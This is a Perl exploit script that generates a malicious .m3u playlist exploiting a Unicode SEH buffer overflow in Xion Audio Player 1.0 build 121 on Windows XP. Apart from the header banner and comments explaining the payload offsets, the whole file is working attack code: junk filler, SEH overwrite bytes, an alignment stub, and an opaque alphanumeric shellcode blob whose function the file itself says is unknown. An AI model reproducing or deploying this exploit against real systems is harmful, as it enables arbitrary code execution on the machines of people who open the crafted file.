# [*] Vulnerability : Xion Audio Player Local BOF # [*] Discovered by : Dragon Rider (http://securityreason.com/exploitalert/7392) # [*] drag0n.rider(at)hotmail.com # [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com) # [*] Sploit released : nov 3rd, 2009 # [*] Type : local and remote code execution # [*] OS : Windows # [*] Product : Xion Audio Player # [*] Versions affected : 1.0 build 121 # [*] Download from : http://www.brothersoft.com/xion-audio-player-download-49404.html # [*] ------------------------------------------------------------------------- # [*] Method : SEH # [*] Tested on : XP SP3 En # [*] Greetz&Tx to : DellNull/EdiStrosar/F/P/W # [*] ------------------------------------------------------------------------- # MMMMM~. # MMMMM?. # MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM. # MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM: # MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM: # MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM: # MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM: # MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM: # =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM: # .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM: # .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,. # eip hunters # ----------------------------------------------------------------------------- # Script provided 'as is', without any warranty. # Use for educational purposes only. 
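#
# Builds the crafted .m3u playlist for the Xion Audio Player SEH overflow
# described in the header above and writes it to the current directory.
#
# Payload layout (byte offsets into the file):
#   [0..253]    254 x 'A'          filler up to the SEH record
#   [254..255]  $nseh  \x58\x48    overwrites the next-SEH pointer
#   [256..257]  $seh   \xf5\x48    overwrites the SE handler pointer
#   [258..269]  $align             12-byte register-alignment stub
#   [270..272]  $jump              3-byte transfer stub
#   [273..345]  73 x 'A'           padding up to the shellcode
#   [346..]     shellcode + 0xCC filler, padded to exactly 17990 bytes
#   total: 18336 bytes
#
# NOTE(review): nseh/seh are only 2 bytes each and every stub instruction
# is separated by a \x6d byte, which is characteristic of a target that
# expands the playlist text to UTF-16 (each byte followed by \x00) before
# the overflow, i.e. a Unicode ("venetian") SEH exploit.  This file does
# not state that explicitly -- confirm in a debugger before reusing the
# offsets or the handler address against another build.
#
# The shellcode is an opaque alphanumeric blob; what it does cannot be
# determined from this file.  Treat it as untrusted: generate your own
# payload with a known encoder rather than reusing this one.
#
# For authorized testing and education only (see header).
use strict;
use warnings;

my $sploitfile = "corelansploit.m3u";

# 254 bytes of filler reach the SEH record.
my $junk = "\x41" x 254;

# Next-SEH and SE-handler overwrite (2 bytes each; see the UTF-16 note).
my $nseh = "\x58\x48";
my $seh  = "\xf5\x48";

# Register-alignment stub.  The \x6d bytes between instructions are
# separators that keep the stub executable after the conversion noted above.
my $align = "\x55";
$align .= "\x6d";
$align .= "\x58";
$align .= "\x6d";
$align .= "\x05\x10\x11";
$align .= "\x6d";
$align .= "\x2d\x02\x11";
$align .= "\x6d";

# Transfer stub: \x50 (push eax), separator, \xc3 (ret).
my $jump = "\x50";
$jump .= "\x6d";
$jump .= "\xc3";

my $padding = "A" x 73;

# Encoded, alphanumeric-only shellcode -- keep byte-for-byte.
my $shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8Q4KPKPKP4KQ5OLTKSLLERXM1JOTK0OLXDK1OO0M1JKPITK044KKQJN01WPTYVLE4Y0BTKW91WZLMKQ7RJKZTOKB4NDLDCE9UDKQOMTKQJKRFDKLLPKTKQOMLKQJKTKMLDKKQZKSYQLO4M4WSNQGPBDTKOPNPSUY0D8LLTKOPLLTKRPML6MTK2HKXZKM94K3PVPKPKPKPDK1XOL1ONQJVC0PVTIL853WP3K0PBHZPTJKTQO2HV8KNSZLNPWKOYWQSQQRLQSKPA";

# The shellcode slot is a fixed 17990 bytes; a longer payload would
# silently shift the file size, so refuse it instead of guessing.
die "shellcode exceeds the 17990-byte slot\n" if length($shellcode) > 17990;

# 0xCC (x86 int3) filler: if control lands past the shellcode under a
# debugger it breaks immediately instead of running into garbage.
my $filler = "\xcc" x (17990 - length($shellcode));

my $payload = $junk . $nseh . $seh . $align . $jump . $padding . $shellcode . $filler;

# Three-arg open on a lexical handle, raw mode so no CRLF layer rewrites
# payload bytes on Windows, and every I/O call checked -- a partial or
# failed write must not be reported as success.
open my $fh, '>', $sploitfile or die "open $sploitfile: $!";
binmode $fh or die "binmode $sploitfile: $!";
print {$fh} $payload or die "write $sploitfile: $!";
close $fh or die "close $sploitfile: $!";

print "Wrote " . length($payload) . " bytes to $sploitfile\n";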